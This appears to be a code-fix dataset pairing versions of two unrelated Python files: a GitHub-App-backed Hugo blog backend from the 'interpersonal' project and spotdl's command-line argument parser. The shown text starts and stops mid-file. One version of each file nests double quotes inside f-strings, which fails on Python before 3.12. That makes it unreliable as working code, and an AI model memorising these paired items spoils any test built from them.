These routes should not be called from this function.
This function uses the requests library to call the GH REST API directly.
For other API calls, we use the GhApi package,
but that package has problems with JWT bearer token auth.
See /docs/ghapi.md for more details.
"""
# Allow passing in headers=, but always set auth/accept/UA headers here
override_headers = {
"Authorization": f"Bearer {self.ghajwt.token}",
"Accept": "application/vnd.github.v3+json",
"User-Agent": "interpersonal.micahrl.com",
}
input_headers = headers or {}
req_headers = {**input_headers, **override_headers}
result = requests.request(method, uri, headers=req_headers, **kwargs)
result.raise_for_status()
return result.json()
def app_installations(self):
"""Call the GH API for /app/installations
See example result in
/docs/github-rest-api-examples/app-installations.json
"""
result = self.call("GET", f"https://api.github.com/app/installations")
return result
def app_installations_instid_accesstoks(self, instid):
"""Call the GH API for /app/installations/:installation_id/access_tokens
See example result in
/docs/github-rest-api-examples/app-installations-instid-accesstokens.json
"""
result = self.call(
"POST", f"https://api.github.com/app/installations/{instid}/access_tokens"
)
return result
# TODO: list all the different Github authentication types and point to their docs
# ... having the JWT tokens to auth the app and then get individual inst tokens is confusing
def install_token(self, owner: str):
"""Get an access token for modifying repo content.
owner: The GH username of the owner of the repo we're installed to.
This is probably just your Github username,
but if you installed the app into an org,
it will be the org name.
- Get a list of all installations
- Find our owner's installation ID
- Get access token for that installation
Caches the result and only regenerates the token if it is expiring soon
"""
if (
owner not in self._install_tokens
or self._install_tokens[owner]["expires_at"] <= datetime.utcnow()
):
installs = self.app_installations()
ours = [i for i in installs if i["account"]["login"] == owner]
if len(ours) > 1:
raise Exception(
"Unexpected API result, multiple installations for our user"
)
if len(ours) < 1:
raise Exception(f"App has not been installed to {owner}'s account")
install = ours[0]
tok = self.app_installations_instid_accesstoks(install["id"])
parsed_expires_at = datetime.strptime(
tok["expires_at"], "%Y-%m-%dT%H:%M:%SZ"
)
tok["expires_at"] = parsed_expires_at
self._install_tokens[owner] = tok
return self._install_tokens[owner]
class HugoGithubRepo(base.HugoBase):
"""A Hugo blog kept in a github.com repo
Assumptions:
- The blog is hosted on the default branch
A note on "content" with Github and Hugo:
-----------------------------------------
The word "content" is a bit overloaded within these realms.
Be aware of the following:
* Hugo uses it for your site's content, so a blog post might be at content/blog/post-slug/index.md. This is the value we referemce with 'self.dirs.content'.
* Github uses it in several REST API paths, e.g. "/repos/{owner}/{repo}/contents/{path}" to get the _contents_ of a file at {path}
"""
def __init__(
self,
name,
uri,
interpersonal_uri,
sectionmap,
owner: str,
repo: str,
branch: str,
github_app_id: str,
private_key_pem: str,
*,
mediastaging="",
mediaprefix="",
):
self.owner = owner
self.repo = repo
self.github_app_id = github_app_id
ghapp_jwt = GithubAppJwt(private_key_pem, github_app_id)
self.ghappapi = GithubApiAppJwtAuth(ghapp_jwt)
self.mediadir = f"static/{mediaprefix.strip("/")}"
self.branch = branch
super().__init__(
name,
uri,
interpersonal_uri,
sectionmap,
mediaprefix=mediaprefix,
mediastaging=mediastaging,
)
def _logged_api(self, *args, **kwargs):
"""Call self.api, logging parameters and results"""
apptok = self.ghappapi.install_token(self.owner)
api = GhApi(token=apptok["token"])
try:
resp = api(*args, **kwargs)
current_app.logger.debug(
f"_logged_api called with *args {args} and **kwargs {kwargs}, returned {resp}"
)
return resp
except BaseException as exc:
current_app.logger.debug(
f"_logged_api called with *args {args} and **kwargs {kwargs} threw exception {exc}"
)
# GhApi doesn't surface error details from Github
# Try to find them ourselves here
# <https://github.com/fastai/ghapi/issues/79>
try:
# Reminder: you can only call .read() once, and there is no .seek()
exc_fp_data = exc.fp.read()
result_body = json.loads(exc_fp_data)
current_app.logger.debug(f"Result body from github: {result_body}")
except BaseException as inner_exc:
current_app.logger.debug(
f"Tried to get result body from Github, but was unsuccessful, err: {inner_exc}"
)
raise exc
def _get_raw_post_body(self, uri: str) -> base.HugoPostSource:
for indexname in ["index.md", "index.html"]:
indexpath = os.path.join(self._uri_to_post_bundle_dir(uri), indexname)
resp = self._get_repo_file_if_exists(indexpath)
if resp:
break
else:
raise InterpersonalNotFoundError
content = base64.b64decode(resp["content"]).decode()
current_app.logger.debug(
f"_get_raw_post_body({uri}) found b64-decoded file contents of {content}"
)
return content
def _add_raw_post_body(
self, slug: str, raw_body: str, section: str, body_type: str = ""
) -> str:
ppath = self._post_path(slug, section)
if body_type == "html":
filename = "index.html"
else:
filename = "index.md"
self._logged_api(
r"/repos/{owner}/{repo}/contents/{path}",
"PUT",
route=dict(
owner=self.owner,
repo=self.repo,
path=f"{self.dirs.content}/{ppath}/{filename}",
),
data={
"message": f"Creating post for {slug} from Interpersonal",
"content": base64.b64encode(raw_body.encode()).decode(),
},
)
return f"{self.baseuri}{ppath}"
def _get_repo_file_if_exists(self, path: str) -> typing.Union[typing.Any, None]:
"""Retrieve a single file if it exists, or None if not"""
try:
get_resp = self._logged_api(
r"/repos/{owner}/{repo}/contents/{path}",
"GET",
route=dict(owner=self.owner, repo=self.repo, path=path),
)
current_app.logger.debug(f"Successfully retrieved file from {path}")
return get_resp
except BaseException as exc:
try:
statuscode = int(exc.status)
except BaseException as inner_exc:
statuscode = None
if statuscode != 404:
current_app.logger.error(
f"Unhandled error trying to talk to github, re-raising..."
)
raise
current_app.logger.debug(f"No file exists at {path}")
return None
def _add_repo_file_if_not_exists(
self, relpath: str, opaque_file: base.OpaqueFile
) -> base.AddedMediaItem:
"""Given a repo-relative path and a file, upload it if it does not exist"""
# TODO: are githubusercontent.com URIs going to work well?
uploaded_uri = f"https://raw.githubusercontent.com/{self.owner}/{self.repo}/{self.branch}/content/{relpath}"
file_exists = self._get_repo_file_if_exists(relpath)
if file_exists:
current_app.logger.debug(
f"Media already exists at {relpath}, nothing to do..."
)
created = False
else:
current_app.logger.debug(
f"Media does not yet exist at {relpath}, will upload..."
)
put_resp = self._logged_api(
r"/repos/{owner}/{repo}/contents/{path}",
"PUT",
route=dict(owner=self.owner, repo=self.repo, path=relpath),
data=dict(
message=f"Add media item {relpath}",
content=base64.b64encode(opaque_file.contents).decode(),
),
)
created = True
return base.AddedMediaItem(uploaded_uri, created)
def _add_media(
self, media: typing.List[base.OpaqueFile]
) -> typing.List[base.AddedMediaItem]:
items: typing.List[base.AddedMediaItem] = []
for item in media:
relpath = f"{self.mediadir}/{item.hexdigest}/{item.filename}"
if self.mediastaging:
added = self._add_media_staging([item])
items += added
else:
uploaded = self._add_repo_file_if_not_exists(relpath, item)
items.append(uploaded)
return items
def _delete_media(self, uris: typing.List[str]):
"""Delete media from Github.
Not required for the implementation, but useful for e2e tests.
Assumes URIs are raw.githubusercontent.com URIs - NOT final published content URIs!
Again, this is really just for testing.
TODO: Modify this to work in remote media dir mode, and make it a noop in local staging mode
Was originally written assuming that the media endpoint uploads directly to
a staging directory in the Github repo, and the files are later moved.
However, now when Interpersonal is in staging mode,
it holds media files temporarily on its own server,
so this is only useful in remote media dir mode.
"""
for uri in uris:
esc_uri_prefix = re.escape(
f"https://raw.githubusercontent.com/{self.owner}/{self.repo}/{self.branch}/content/"
)
relpath = re.sub(esc_uri_prefix, "", uri)
# Get the file so that we can reference its sha
get_resp = self._logged_api(
r"/repos/{owner}/{repo}/contents/{path}",
"GET",
route=dict(owner=self.owner, repo=self.repo, path=relpath),
)
# Actually delete the file, referencing the file's sha
del_resp = self._logged_api(
r"/repos/{owner}/{repo}/contents/{path}",
"DELETE",
route=dict(owner=self.owner, repo=self.repo, path=relpath),
data=dict(
message=f"Remove media item {relpath}",
sha=get_resp["sha"],
),
)
def _collect_media_for_post(
self, postslug: str, postbody: str, section: str, media: typing.List[str]
) -> str:
for staging_uri in media:
if not staging_uri.startswith(self.interpersonal_uri):
current_app.logger.debug(
f"Media collection will skip URI '{staging_uri}' as it is not prefixed with what we expect '{self.interpersonal_uri}'."
)
continue
splituri = staging_uri.split("/")
digest = splituri[-2]
filename = splituri[-1]
localpath = os.path.join(self.mediastaging, digest, filename)
repopath = os.path.join("content", section, postslug, digest, filename)
if not os.path.exists(localpath):
raise InterpersonalNotFoundError(localpath)
new_uri = self._media_item_uri_collected(postslug, section, staging_uri)
postbody = re.sub(re.escape(staging_uri), new_uri, postbody)
repofile = self._get_repo_file_if_exists(repopath)
if repofile:
current_app.logger.debug(
f"Media already exists at {repopath}, nothing to do..."
)
continue
else:
current_app.logger.debug(
f"Media does not yet exist at {repopath}, will upload..."
)
with open(localpath, "rb") as fp:
b64content = base64.b64encode(fp.read()).decode()
put_resp = self._logged_api(
r"/repos/{owner}/{repo}/contents/{path}",
"PUT",
route=dict(owner=self.owner, repo=self.repo, path=repopath),
data=dict(
message=f"Add media item {repopath}",
content=b64content,
),
)
return postbody | """Sites hosted on Github"""
import base64
import json
import os.path
import re
import time
import typing
from datetime import datetime
import jwt
import requests
from flask import current_app
from ghapi.all import GhApi
from interpersonal.errors import InterpersonalNotFoundError
from interpersonal.sitetypes import base
class GithubAppJwt:
"""A Github JWT token
<https://docs.github.com/en/developers/apps/building-github-apps/authenticating-with-github-apps#jwt-payload>
app_id: The Github application ID
private_key_pem: A string containing either the private key or a path to it
"""
def __init__(self, private_key_pem: str, app_id: str):
self.app_id = app_id
try:
with open(private_key_pem) as pkf:
key_contents = pkf.read().encode()
except FileNotFoundError:
key_contents = private_key_pem.encode()
self.key = key_contents
self._token = None
self.expires = 0
@property
def token(self):
"""Retrieve the JWT token
Caches the result and only regenerates the token if it is expiring soon
"""
expiring_soon = self.expires < (int(time.time()) - 15)
if self._token is None or expiring_soon:
now = int(time.time())
expires = now + (10 * 60)
payload = {
# issued at time, 60 seconds in the past to allow for clock drift
"iat": now - 60,
# JWT expiration time (10 minute maximum)
"exp": expires,
# GitHub App's identifier
"iss": int(self.app_id),
}
self.expires = expires
token = jwt.encode(payload, self.key, "RS256")
if isinstance(token, bytes):
token = token.decode("utf-8")
self._token = token
return self._token
class GithubApiAppJwtAuth:
"""Call the Github API with the app JWT bearer token authentication.
This is for authenticating _as the app_,
NOT for authenticating _as a particular installation of the app_.
This is required for URIs like /app/installations,
which are not specific to a given installation but are for the whole app.
URIs like "/repos/{owner}/{repo}/contents/{path}" only work when authenticating
_as a particular installation of the app_.
These routes should not be called from this function.
This function uses the requests library to call the GH REST API directly.
For other API calls, we use the GhApi package,
but that package has problems with JWT bearer token auth.
See /docs/ghapi.md for more details.
"""
def __init__(self, ghajwt: GithubAppJwt):
self.ghajwt = ghajwt
self._install_tokens = {}
def call(self, method, uri, headers=None, **kwargs):
"""Call the Github API with the app JWT bearer token authentication.
This is for authenticating _as the app_,
NOT for authenticating _as a particular installation of the app_.
This is required for URIs like /app/installations,
which are not specific to a given installation but are for the whole app.
URIs like "/repos/{owner}/{repo}/contents/{path}" only work when authenticating
_as a particular installation of the app_.
These routes should not be called from this function.
This function uses the requests library to call the GH REST API directly.
For other API calls, we use the GhApi package,
but that package has problems with JWT bearer token auth.
See /docs/ghapi.md for more details.
"""
# Allow passing in headers=, but always set auth/accept/UA headers here
override_headers = {
"Authorization": f"Bearer {self.ghajwt.token}",
"Accept": "application/vnd.github.v3+json",
"User-Agent": "interpersonal.micahrl.com",
}
input_headers = headers or {}
req_headers = {**input_headers, **override_headers}
result = requests.request(method, uri, headers=req_headers, **kwargs)
result.raise_for_status()
return result.json()
def app_installations(self):
"""Call the GH API for /app/installations
See example result in
/docs/github-rest-api-examples/app-installations.json
"""
result = self.call("GET", f"https://api.github.com/app/installations")
return result
def app_installations_instid_accesstoks(self, instid):
"""Call the GH API for /app/installations/:installation_id/access_tokens
See example result in
/docs/github-rest-api-examples/app-installations-instid-accesstokens.json
"""
result = self.call(
"POST", f"https://api.github.com/app/installations/{instid}/access_tokens"
)
return result
# TODO: list all the different Github authentication types and point to their docs
# ... having the JWT tokens to auth the app and then get individual inst tokens is confusing
def install_token(self, owner: str):
"""Get an access token for modifying repo content.
owner: The GH username of the owner of the repo we're installed to.
This is probably just your Github username,
but if you installed the app into an org,
it will be the org name.
- Get a list of all installations
- Find our owner's installation ID
- Get access token for that installation
Caches the result and only regenerates the token if it is expiring soon
"""
if (
owner not in self._install_tokens
or self._install_tokens[owner]["expires_at"] <= datetime.utcnow()
):
installs = self.app_installations()
ours = [i for i in installs if i["account"]["login"] == owner]
if len(ours) > 1:
raise Exception(
"Unexpected API result, multiple installations for our user"
)
if len(ours) < 1:
raise Exception(f"App has not been installed to {owner}'s account")
install = ours[0]
tok = self.app_installations_instid_accesstoks(install["id"])
parsed_expires_at = datetime.strptime(
tok["expires_at"], "%Y-%m-%dT%H:%M:%SZ"
)
tok["expires_at"] = parsed_expires_at
self._install_tokens[owner] = tok
return self._install_tokens[owner]
class HugoGithubRepo(base.HugoBase):
"""A Hugo blog kept in a github.com repo
Assumptions:
- The blog is hosted on the default branch
A note on "content" with Github and Hugo:
-----------------------------------------
The word "content" is a bit overloaded within these realms.
Be aware of the following:
* Hugo uses it for your site's content, so a blog post might be at content/blog/post-slug/index.md. This is the value we referemce with 'self.dirs.content'.
* Github uses it in several REST API paths, e.g. "/repos/{owner}/{repo}/contents/{path}" to get the _contents_ of a file at {path}
"""
def __init__(
self,
name,
uri,
interpersonal_uri,
sectionmap,
owner: str,
repo: str,
branch: str,
github_app_id: str,
private_key_pem: str,
*,
mediastaging="",
mediaprefix="",
):
self.owner = owner
self.repo = repo
self.github_app_id = github_app_id
ghapp_jwt = GithubAppJwt(private_key_pem, github_app_id)
self.ghappapi = GithubApiAppJwtAuth(ghapp_jwt)
self.mediadir = f"static/{mediaprefix.strip('/')}"
self.branch = branch
super().__init__(
name,
uri,
interpersonal_uri,
sectionmap,
mediaprefix=mediaprefix,
mediastaging=mediastaging,
)
def _logged_api(self, *args, **kwargs):
"""Call self.api, logging parameters and results"""
apptok = self.ghappapi.install_token(self.owner)
api = GhApi(token=apptok["token"])
try:
resp = api(*args, **kwargs)
current_app.logger.debug(
f"_logged_api called with *args {args} and **kwargs {kwargs}, returned {resp}"
)
return resp
except BaseException as exc:
current_app.logger.debug(
f"_logged_api called with *args {args} and **kwargs {kwargs} threw exception {exc}"
)
# GhApi doesn't surface error details from Github
# Try to find them ourselves here
# <https://github.com/fastai/ghapi/issues/79>
try:
# Reminder: you can only call .read() once, and there is no .seek()
exc_fp_data = exc.fp.read()
result_body = json.loads(exc_fp_data)
current_app.logger.debug(f"Result body from github: {result_body}")
except BaseException as inner_exc:
current_app.logger.debug(
f"Tried to get result body from Github, but was unsuccessful, err: {inner_exc}"
)
raise exc
def _get_raw_post_body(self, uri: str) -> base.HugoPostSource:
for indexname in ["index.md", "index.html"]:
indexpath = os.path.join(self._uri_to_post_bundle_dir(uri), indexname)
resp = self._get_repo_file_if_exists(indexpath)
if resp:
break
else:
raise InterpersonalNotFoundError
content = base64.b64decode(resp["content"]).decode()
current_app.logger.debug(
f"_get_raw_post_body({uri}) found b64-decoded file contents of {content}"
)
return content
def _add_raw_post_body(
self, slug: str, raw_body: str, section: str, body_type: str = ""
) -> str:
ppath = self._post_path(slug, section)
if body_type == "html":
filename = "index.html"
else:
filename = "index.md"
self._logged_api(
r"/repos/{owner}/{repo}/contents/{path}",
"PUT",
route=dict(
owner=self.owner,
repo=self.repo,
path=f"{self.dirs.content}/{ppath}/{filename}",
),
data={
"message": f"Creating post for {slug} from Interpersonal",
"content": base64.b64encode(raw_body.encode()).decode(),
},
)
return f"{self.baseuri}{ppath}"
def _get_repo_file_if_exists(self, path: str) -> typing.Union[typing.Any, None]:
"""Retrieve a single file if it exists, or None if not"""
try:
get_resp = self._logged_api(
r"/repos/{owner}/{repo}/contents/{path}",
"GET",
route=dict(owner=self.owner, repo=self.repo, path=path),
)
current_app.logger.debug(f"Successfully retrieved file from {path}")
return get_resp
except BaseException as exc:
try:
statuscode = int(exc.status)
except BaseException as inner_exc:
statuscode = None
if statuscode != 404:
current_app.logger.error(
f"Unhandled error trying to talk to github, re-raising..."
)
raise
current_app.logger.debug(f"No file exists at {path}")
return None
def _add_repo_file_if_not_exists(
self, relpath: str, opaque_file: base.OpaqueFile
) -> base.AddedMediaItem:
"""Given a repo-relative path and a file, upload it if it does not exist"""
# TODO: are githubusercontent.com URIs going to work well?
uploaded_uri = f"https://raw.githubusercontent.com/{self.owner}/{self.repo}/{self.branch}/content/{relpath}"
file_exists = self._get_repo_file_if_exists(relpath)
if file_exists:
current_app.logger.debug(
f"Media already exists at {relpath}, nothing to do..."
)
created = False
else:
current_app.logger.debug(
f"Media does not yet exist at {relpath}, will upload..."
)
put_resp = self._logged_api(
r"/repos/{owner}/{repo}/contents/{path}",
"PUT",
route=dict(owner=self.owner, repo=self.repo, path=relpath),
data=dict(
message=f"Add media item {relpath}",
content=base64.b64encode(opaque_file.contents).decode(),
),
)
created = True
return base.AddedMediaItem(uploaded_uri, created)
def _add_media(
self, media: typing.List[base.OpaqueFile]
) -> typing.List[base.AddedMediaItem]:
items: typing.List[base.AddedMediaItem] = []
for item in media:
relpath = f"{self.mediadir}/{item.hexdigest}/{item.filename}"
if self.mediastaging:
added = self._add_media_staging([item])
items += added
else:
uploaded = self._add_repo_file_if_not_exists(relpath, item)
items.append(uploaded)
return items
def _delete_media(self, uris: typing.List[str]):
"""Delete media from Github.
Not required for the implementation, but useful for e2e tests.
Assumes URIs are raw.githubusercontent.com URIs - NOT final published content URIs!
Again, this is really just for testing.
TODO: Modify this to work in remote media dir mode, and make it a noop in local staging mode
Was originally written assuming that the media endpoint uploads directly to
a staging directory in the Github repo, and the files are later moved.
However, now when Interpersonal is in staging mode,
it holds media files temporarily on its own server,
so this is only useful in remote media dir mode.
"""
for uri in uris:
esc_uri_prefix = re.escape(
f"https://raw.githubusercontent.com/{self.owner}/{self.repo}/{self.branch}/content/"
)
relpath = re.sub(esc_uri_prefix, "", uri)
# Get the file so that we can reference its sha
get_resp = self._logged_api(
r"/repos/{owner}/{repo}/contents/{path}",
"GET",
route=dict(owner=self.owner, repo=self.repo, path=relpath),
)
# Actually delete the file, referencing the file's sha
del_resp = self._logged_api(
r"/repos/{owner}/{repo}/contents/{path}",
"DELETE",
route=dict(owner=self.owner, repo=self.repo, path=relpath),
data=dict(
message=f"Remove media item {relpath}",
sha=get_resp["sha"],
),
)
def _collect_media_for_post(
self, postslug: str, postbody: str, section: str, media: typing.List[str]
) -> str:
for staging_uri in media:
if not staging_uri.startswith(self.interpersonal_uri):
current_app.logger.debug(
f"Media collection will skip URI '{staging_uri}' as it is not prefixed with what we expect '{self.interpersonal_uri}'."
)
continue
splituri = staging_uri.split("/")
digest = splituri[-2]
filename = splituri[-1]
localpath = os.path.join(self.mediastaging, digest, filename)
repopath = os.path.join("content", section, postslug, digest, filename)
if not os.path.exists(localpath):
raise InterpersonalNotFoundError(localpath)
new_uri = self._media_item_uri_collected(postslug, section, staging_uri)
postbody = re.sub(re.escape(staging_uri), new_uri, postbody)
repofile = self._get_repo_file_if_exists(repopath)
if repofile:
current_app.logger.debug(
f"Media already exists at {repopath}, nothing to do..."
)
continue
else:
current_app.logger.debug(
f"Media does not yet exist at {repopath}, will upload..."
)
with open(localpath, "rb") as fp:
b64content = base64.b64encode(fp.read()).decode()
put_resp = self._logged_api(
r"/repos/{owner}/{repo}/contents/{path}",
"PUT",
route=dict(owner=self.owner, repo=self.repo, path=repopath),
data=dict(
message=f"Add media item {repopath}",
content=b64content,
),
)
return postbody |
"""
Module that handles the command line arguments.
"""
import sys
from argparse import _ArgumentGroup, ArgumentParser, Namespace
from spotdl import _version
from spotdl.download.progress_handler import NAME_TO_LEVEL
from spotdl.utils.ffmpeg import FFMPEG_FORMATS
from spotdl.utils.config import DEFAULT_CONFIG
from spotdl.utils.formatter import VARS
from spotdl.download.downloader import (
AUDIO_PROVIDERS,
LYRICS_PROVIDERS,
)
OPERATIONS = ["download", "save", "preload", "web", "sync"]
def parse_arguments() -> Namespace:
"""
Parse arguments from the command line.
### Returns
- A Namespace object containing the parsed arguments.
"""
# Initialize argument parser
parser = ArgumentParser(
prog="spotdl",
description="Download your Spotify playlists and songs along with album art and metadata",
)
# Parse main options
main_options = parser.add_argument_group("Main options")
parse_main_options(main_options)
# Parse spotify options
spotify_options = parser.add_argument_group("Spotify options")
parse_spotify_options(spotify_options)
# Parse ffmpeg options
ffmpeg_options = parser.add_argument_group("FFmpeg options")
parse_ffmpeg_options(ffmpeg_options)
# Parse output options
output_options = parser.add_argument_group("Output options")
parse_output_options(output_options)
# Parse misc options
misc_options = parser.add_argument_group("Misc options")
parse_misc_options(misc_options)
# Parse other options
other_options = parser.add_argument_group("Other options")
parse_other_options(other_options)
return parser.parse_args()
def parse_main_options(parser: _ArgumentGroup):
"""
Parse main options from the command line.
### Arguments
- parser: The argument parser to add the options to.
"""
# Add operation argument
operation = parser.add_argument(
"operation",
choices=OPERATIONS,
help="The operation to perform.",
)
# Add query argument
query = parser.add_argument(
"query",
nargs="+",
type=str,
help="URL for a song/playlist/album/artist/etc. to download.",
)
try:
is_web = sys.argv[1] == "web"
except IndexError:
is_web = False
is_frozen = getattr(sys, "frozen", False)
if (is_frozen and len(sys.argv) < 2) or (len(sys.argv) > 1 and is_web):
if not is_web or (is_frozen and not is_web):
parser._remove_action(operation) # pylint: disable=protected-access
parser._remove_action(query) # pylint: disable=protected-access
# Audio provider argument
parser.add_argument(
"--audio",
dest="audio_providers",
nargs="*",
choices=AUDIO_PROVIDERS,
default=DEFAULT_CONFIG["audio_providers"],
help="The audio provider to use. You can provide more than one for fallback.",
)
# Lyrics provider argument
parser.add_argument(
"--lyrics",
dest="lyrics_providers",
nargs="*",
choices=LYRICS_PROVIDERS.keys(),
default=DEFAULT_CONFIG["lyrics_providers"],
help="The lyrics provider to use. You can provide more than one for fallback.",
)
# Add config argument
parser.add_argument(
"--config",
action="store_true",
help=(
"Use the config file to download songs. "
"It's located under `C:\\Users\\user\\.spotdl\\config.json` "
"or `~/.spotdl/config.json` under linux"
),
)
# Add search query argument
parser.add_argument(
"--search-query",
default=DEFAULT_CONFIG["search_query"],
help=f"The search query to use, available variables: {", ".join(VARS)}",
)
# Add don't filter results argument
parser.add_argument(
"--dont-filter-results",
action="store_false",
dest="filter_results",
default=DEFAULT_CONFIG["filter_results"],
help="Disable filtering results.",
)
def parse_spotify_options(parser: _ArgumentGroup):
"""
Parse spotify options from the command line.
### Arguments
- parser: The argument parser to add the options to.
"""
# Add login argument
parser.add_argument(
"--user-auth",
action="store_true",
default=DEFAULT_CONFIG["user_auth"],
help="Login to Spotify using OAuth.",
)
# Add client id argument
parser.add_argument(
"--client-id",
default=DEFAULT_CONFIG["client_id"],
help="The client id to use when logging in to Spotify.",
)
# Add client secret argument
parser.add_argument(
"--client-secret",
default=DEFAULT_CONFIG["client_secret"],
help="The client secret to use when logging in to Spotify.",
)
# Add cache path argument
parser.add_argument(
"--cache-path",
type=str,
default=DEFAULT_CONFIG["cache_path"],
help="The path where spotipy cache file will be stored.",
)
# Add no cache argument
parser.add_argument(
"--no-cache",
action="store_true",
default=DEFAULT_CONFIG["no_cache"],
help="Disable caching.",
)
# Add cookie file argument
parser.add_argument(
"--cookie-file",
default=DEFAULT_CONFIG["cookie_file"],
help="Path to cookies file.",
)
def parse_ffmpeg_options(parser: _ArgumentGroup):
"""
Parse ffmpeg options from the command line.
### Arguments
- parser: The argument parser to add the options to.
"""
# Add ffmpeg executable argument
parser.add_argument(
"--ffmpeg",
default=DEFAULT_CONFIG["ffmpeg"],
help="The ffmpeg executable to use.",
)
# Add search threads argument
parser.add_argument(
"--threads",
default=DEFAULT_CONFIG["threads"],
type=int,
help="The number of threads to use when downloading songs.",
)
# Add constant bit rate argument
parser.add_argument(
"--bitrate",
choices=[
"8k",
"16k",
"24k",
"32k",
"40k",
"48k",
"64k",
"80k",
"96k",
"112k",
"128k",
"160k",
"192k",
"224k",
"256k",
"320k",
],
default=DEFAULT_CONFIG["bitrate"],
type=str.lower,
help="The constant bitrate to use for the output file.",
)
# Additional ffmpeg arguments
parser.add_argument(
"--ffmpeg-args",
type=str,
default=DEFAULT_CONFIG["ffmpeg_args"],
help="Additional ffmpeg arguments passed as a string.",
)
def parse_output_options(parser: _ArgumentGroup):
"""
Parse output options from the command line.
### Arguments
- parser: The argument parser to add the options to.
"""
# Add output format argument
parser.add_argument(
"--format",
choices=FFMPEG_FORMATS.keys(),
default=DEFAULT_CONFIG["format"],
help="The format to download the song in.",
)
# Add save file argument
parser.add_argument(
"--save-file",
type=str,
default=DEFAULT_CONFIG["save_file"],
help="The file to save/load the songs data from/to. It has to end with .spotdl",
required=len(sys.argv) > 1 and sys.argv[1] in ["save", "preload"],
)
# Add name format argument
parser.add_argument(
"--output",
type=str,
default=DEFAULT_CONFIG["output"],
help=f"Specify the downloaded file name format, available variables: {", ".join(VARS)}",
)
# Add m3u argument
parser.add_argument(
"--m3u",
type=str,
default=DEFAULT_CONFIG["m3u"],
help="Name of the m3u file to save the songs to.",
)
# Add overwrite argument
parser.add_argument(
"--overwrite",
choices={"force", "skip"},
default=DEFAULT_CONFIG["overwrite"],
help="Overwrite existing files.",
)
# Option to restrict filenames for easier handling in the shell
parser.add_argument(
"--restrict",
default=DEFAULT_CONFIG["restrict"],
help="Restrict filenames to ASCII only",
action="store_true",
)
# Option to print errors on exit, useful for long playlist
parser.add_argument(
"--print-errors",
default=DEFAULT_CONFIG["print_errors"],
help="Print errors (wrong songs, failed downloads etc) on exit, useful for long playlist",
action="store_true",
)
# Option to use sponsor block
parser.add_argument(
"--sponsor-block",
default=DEFAULT_CONFIG["sponsor_block"],
help="Use the sponsor block to download songs from yt/ytm.",
action="store_true",
)
def parse_misc_options(parser: _ArgumentGroup):
"""
Parse misc options from the command line.
### Arguments
- parser: The argument parser to add the options to.
"""
# Add verbose argument
parser.add_argument(
"--log-level",
choices=NAME_TO_LEVEL.keys(),
help="Select log level.",
)
# Add simple tui argument
parser.add_argument(
"--simple-tui",
action="store_true",
default=DEFAULT_CONFIG["simple_tui"],
help="Use a simple tui.",
)
# Add headless argument
parser.add_argument(
"--headless",
action="store_true",
default=DEFAULT_CONFIG["headless"],
help="Run in headless mode.",
)
def parse_other_options(parser: _ArgumentGroup):
"""
Parse other options from the command line.
### Arguments
- parser: The argument parser to add the options to.
"""
parser.add_argument(
"--download-ffmpeg",
action="store_true",
help="Download ffmpeg to spotdl directory.",
)
parser.add_argument(
"--generate-config",
action="store_true",
help="Generate a config file. This will overwrite current config if present.",
)
parser.add_argument(
"--check-for-updates", action="store_true", help="Check for new version."
)
parser.add_argument(
"--profile",
action="store_true",
help="Run in profile mode. Useful for debugging.",
)
parser.add_argument(
"--version",
"-v",
action="version",
help="Show the version number and exit.",
version=_version.__version__,
)
| """
Module that handles the command line arguments.
"""
import sys
from argparse import _ArgumentGroup, ArgumentParser, Namespace
from spotdl import _version
from spotdl.download.progress_handler import NAME_TO_LEVEL
from spotdl.utils.ffmpeg import FFMPEG_FORMATS
from spotdl.utils.config import DEFAULT_CONFIG
from spotdl.utils.formatter import VARS
from spotdl.download.downloader import (
AUDIO_PROVIDERS,
LYRICS_PROVIDERS,
)
OPERATIONS = ["download", "save", "preload", "web", "sync"]
def parse_arguments() -> Namespace:
"""
Parse arguments from the command line.
### Returns
- A Namespace object containing the parsed arguments.
"""
# Initialize argument parser
parser = ArgumentParser(
prog="spotdl",
description="Download your Spotify playlists and songs along with album art and metadata",
)
# Parse main options
main_options = parser.add_argument_group("Main options")
parse_main_options(main_options)
# Parse spotify options
spotify_options = parser.add_argument_group("Spotify options")
parse_spotify_options(spotify_options)
# Parse ffmpeg options
ffmpeg_options = parser.add_argument_group("FFmpeg options")
parse_ffmpeg_options(ffmpeg_options)
# Parse output options
output_options = parser.add_argument_group("Output options")
parse_output_options(output_options)
# Parse misc options
misc_options = parser.add_argument_group("Misc options")
parse_misc_options(misc_options)
# Parse other options
other_options = parser.add_argument_group("Other options")
parse_other_options(other_options)
return parser.parse_args()
def parse_main_options(parser: _ArgumentGroup):
"""
Parse main options from the command line.
### Arguments
- parser: The argument parser to add the options to.
"""
# Add operation argument
operation = parser.add_argument(
"operation",
choices=OPERATIONS,
help="The operation to perform.",
)
# Add query argument
query = parser.add_argument(
"query",
nargs="+",
type=str,
help="URL for a song/playlist/album/artist/etc. to download.",
)
try:
is_web = sys.argv[1] == "web"
except IndexError:
is_web = False
is_frozen = getattr(sys, "frozen", False)
if (is_frozen and len(sys.argv) < 2) or (len(sys.argv) > 1 and is_web):
if not is_web or (is_frozen and not is_web):
parser._remove_action(operation) # pylint: disable=protected-access
parser._remove_action(query) # pylint: disable=protected-access
# Audio provider argument
parser.add_argument(
"--audio",
dest="audio_providers",
nargs="*",
choices=AUDIO_PROVIDERS,
default=DEFAULT_CONFIG["audio_providers"],
help="The audio provider to use. You can provide more than one for fallback.",
)
# Lyrics provider argument
parser.add_argument(
"--lyrics",
dest="lyrics_providers",
nargs="*",
choices=LYRICS_PROVIDERS.keys(),
default=DEFAULT_CONFIG["lyrics_providers"],
help="The lyrics provider to use. You can provide more than one for fallback.",
)
# Add config argument
parser.add_argument(
"--config",
action="store_true",
help=(
"Use the config file to download songs. "
"It's located under `C:\\Users\\user\\.spotdl\\config.json` "
"or `~/.spotdl/config.json` under linux"
),
)
# Add search query argument
parser.add_argument(
"--search-query",
default=DEFAULT_CONFIG["search_query"],
help=f"The search query to use, available variables: {', '.join(VARS)}",
)
# Add don't filter results argument
parser.add_argument(
"--dont-filter-results",
action="store_false",
dest="filter_results",
default=DEFAULT_CONFIG["filter_results"],
help="Disable filtering results.",
)
def parse_spotify_options(parser: _ArgumentGroup):
"""
Parse spotify options from the command line.
### Arguments
- parser: The argument parser to add the options to.
"""
# Add login argument
parser.add_argument(
"--user-auth",
action="store_true",
default=DEFAULT_CONFIG["user_auth"],
help="Login to Spotify using OAuth.",
)
# Add client id argument
parser.add_argument(
"--client-id",
default=DEFAULT_CONFIG["client_id"],
